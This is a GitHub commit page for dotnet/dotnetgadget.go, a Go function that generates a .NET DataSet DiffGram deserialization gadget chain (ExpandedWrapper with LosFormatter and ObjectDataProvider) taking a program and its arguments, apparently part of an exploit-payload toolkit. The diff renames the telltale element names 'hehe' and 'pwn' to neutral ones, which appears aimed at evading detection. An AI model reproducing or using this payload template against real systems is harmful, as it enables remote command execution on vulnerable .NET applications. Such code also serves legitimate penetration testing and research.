Skip to content

Commit cc03fea

Browse files
removed hehe and pwns....
1 parent 5005f9d commit cc03fea

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

dotnet/dotnetgadget.go

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -114,10 +114,10 @@ func CreateDataSetXMLDiffGram(program string, args string, formatter string) (st
114114
<xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
115115
<xs:complexType>
116116
<xs:choice minOccurs="0" maxOccurs="unbounded">
117-
<xs:element name="hehe">
117+
<xs:element name="element0">
118118
<xs:complexType>
119119
<xs:sequence>
120-
<xs:element name="pwn" msdata:DataType="System.Collections.Generic.List` + "`" + `1[[System.Data.Services.Internal.ExpandedWrapper` + "`" + `2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
120+
<xs:element name="element1" msdata:DataType="System.Collections.Generic.List` + "`" + `1[[System.Data.Services.Internal.ExpandedWrapper` + "`" + `2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
121121
</xs:sequence>
122122
</xs:complexType>
123123
</xs:element>
@@ -136,8 +136,8 @@ func CreateDataSetXMLDiffGram(program string, args string, formatter string) (st
136136

137137
string1 := `<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
138138
<somedataset>
139-
<hehe diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
140-
<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
139+
<element0 diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
140+
<element1 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
141141
<ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
142142
<ExpandedElement/>
143143
<ProjectedProperty0>
@@ -148,8 +148,8 @@ func CreateDataSetXMLDiffGram(program string, args string, formatter string) (st
148148
<ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
149149
</ProjectedProperty0>
150150
</ExpandedWrapperOfLosFormatterObjectDataProvider>
151-
</pwn>
152-
</hehe>
151+
</element1>
152+
</element0>
153153
</somedataset>
154154
</diffgr:diffgram>`
155155
libraryID := 2

0 commit comments

Comments
 (0)